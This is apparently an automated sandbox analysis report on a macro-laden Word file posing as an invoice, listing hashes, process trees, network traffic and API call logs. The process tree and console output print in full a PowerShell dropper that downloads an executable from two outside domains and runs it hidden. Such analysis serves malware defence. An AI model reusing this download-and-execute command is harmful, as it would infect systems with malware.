Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 25, 2021, 11:37 a.m.	June 25, 2021, 11:40 a.m.

Size	80.5KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: 12345, Template: Normal.dotm, Last Saved By: 12345, Revision Number: 32, Name of Creating Application: Microsoft Office Word, Total Editing Time: 29:00, Create Time/Date: Wed Jul 4 09:20:00 2018, Last Saved Time/Date: Wed Jul 4 09:49:00 2018, Number of Pages: 1, Number of Words: 6, Number of Characters: 35, Security: 0
MD5	`66e3e328db7a696b8969d1486d22894a`
SHA256	`fe0f98f1f0f64564150aa919ed1eed350ec6bec96eba7e08a605124afa6fe6aa`
CRC32	`3533A500`
ssdeep	`1536:CQ+mgb6Evkehxknn1N9AQTZZNcQayQlA:CQ+m87vhyn1NnTZZNNQl`
Yara	Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Microsoft_Office_File_Zero - Microsoft Office File

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\Invoice_20180704.doc
3972
- cmd.exe cmd /c powershell "'powershell ""function buhx([string] $coebtarl){(new-object system.net.webclient).downloadfile($coebtarl,''%tmp%\sucbjoh.exe'');start-process ''%tmp%\sucbjoh.exe'';}try{buhx(''http://icoindna.io/bri.ri'')}catch{buhx(''http://meanmuscles.com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%\owqedtxxw.bat; start-process '%tmp%\owqedtxxw.bat' -windowstyle hidden"
  6692
  - powershell.exe powershell "'powershell ""function buhx([string] $coebtarl){(new-object system.net.webclient).downloadfile($coebtarl,''C:\Users\test22\AppData\Local\Temp\sucbjoh.exe'');start-process ''C:\Users\test22\AppData\Local\Temp\sucbjoh.exe'';}try{buhx(''http://icoindna.io/bri.ri'')}catch{buhx(''http://meanmuscles.com/bri.ri'')}'"" | out-file -encoding ascii -filepath C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat; start-process 'C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat' -windowstyle hidden"
    4716
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat" "
      3908
      - powershell.exe powershell "function buhx([string] $coebtarl){(new-object system.net.webclient).downloadfile($coebtarl,'C:\Users\test22\AppData\Local\Temp\sucbjoh.exe');start-process 'C:\Users\test22\AppData\Local\Temp\sucbjoh.exe';}try{buhx('http://icoindna.io/bri.ri')}catch{buhx('http://meanmuscles.com/bri.ri')}
        7664

Name	Response	Post-Analysis Lookup
icoindna.io	A 23.238.35.228	23.238.35.228
meanmuscles.com	A 68.65.120.85	68.65.120.85

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
23.238.35.228	Active	Moloch
68.65.120.85	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49821 -> 68.65.120.85:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49822 -> 68.65.120.85:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 11:37 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 25, 2021, 11:37 a.m.			0	0
IsDebuggerPresent June 25, 2021, 11:37 a.m.			0	0

Command line console output was observed (12 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: powershell console_handle: 0x00000007	1	1
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: "function buhx([string] $coebtarl){(new-object system.net.webclient).downloadfile($coebtarl,'C:\Users\test22\AppData\Local\Temp\sucbjoh.exe');start-process 'C:\Users\test22\AppData\Local\Temp\sucbjoh.exe';}try{buhx('http://icoindna.io/bri.ri')}catch{buhx('http://meanmuscles.com/bri.ri')} console_handle: 0x00000007	1	1
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000002f	1	1
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: At line:1 char:81 console_handle: 0x0000003b	1	1
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: + function buhx([string] $coebtarl){(new-object system.net.webclient).downloadf console_handle: 0x00000047	1	1
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: ile <<<< ($coebtarl,'C:\Users\test22\AppData\Local\Temp\sucbjoh.exe');start-pro console_handle: 0x00000053	1	1
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: cess 'C:\Users\test22\AppData\Local\Temp\sucbjoh.exe';}try{buhx('http://icoindn console_handle: 0x0000005f	1	1
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: a.io/bri.ri')}catch{buhx('http://meanmuscles.com/bri.ri')} console_handle: 0x0000006b	1	1
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000077	1	1
WriteConsoleW June 25, 2021, 11:37 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000083	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 93 events)

Time & API	Arguments	Status	Return
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003369c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003369c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003369c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003369c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003369c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003369c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336208 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00335e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003367c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336a88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336a88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336a88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336a88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336a88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336a88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336a88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0073c020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0073c8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0073c8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0073c8e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 11:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0073c060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 25, 2021, 11:37 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://meanmuscles.com/bri.ri

Performs some HTTP requests (1 event)

request

GET http://meanmuscles.com/bri.ri

Allocates read-write-execute memory (usually to unpack itself) (50 out of 301 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ebb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ec05000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x673a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x66c91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06001000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70731000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70734000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06e60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x743c1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 3972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x507c1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x62ae1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0218a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x62ae2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02182000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02192000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02193000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02194000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0224b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02247000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0218b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02245000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02195000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02196000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0224c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05110000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05111000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
